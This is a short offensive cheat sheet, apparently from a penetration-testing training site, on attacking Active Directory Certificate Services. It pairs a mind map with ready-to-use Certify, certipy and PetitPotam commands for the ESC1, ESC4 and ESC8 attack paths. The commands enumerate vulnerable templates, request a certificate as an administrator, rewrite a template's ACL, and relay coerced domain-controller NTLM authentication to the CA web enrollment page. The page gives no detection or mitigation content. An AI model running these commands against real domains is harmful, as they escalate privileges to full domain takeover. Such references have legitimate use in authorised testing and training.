AD CS Attack Paths
Certificate Services exploitation
AD CS AttacksTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[Enumerate AD CS] --> B[Certify/certipy find]
B --> C{Vulnerable Template?}
C -->|ESC1| D[Request as Other User]
C -->|ESC4| E[Modify Template ACL]
C -->|ESC8| F[NTLM Relay to Web Enrollment]
D --> G[Get Admin Certificate]
E --> D
F --> G
G --> H[Authenticate with Cert]
H --> I[Get TGT/NTLM]
I --> J[Domain Access]
Related Modules
Quick Reference
Enumerate AD CS
Certify.exe find /vulnerable # Find vulnerable templates (ESC1, ESC8, etc.) certipy find -u user@domain -p pass -dc-ip DC # Enumerate AD CS with Certipy
ESC1 - Misconfigured Template
certipy req -u user@domain -p pass -ca CA-NAME -template VulnTemplate -upn admin@domain # Request cert as Admin (ESC1) certipy auth -pfx admin.pfx # Authenticate with certificate
ESC4 - Template ACL
certipy template -u user@domain -p pass -template VulnTemplate -save-old # Modify template to be vulnerable (ESC4)
ESC8 - NTLM Relay to HTTP
certipy relay -target http://ca-server/certsrv/certfnsh.asp # Start NTLM relay to AD CS PetitPotam.py attacker-ip dc-ip # Coerce DC authentication to relay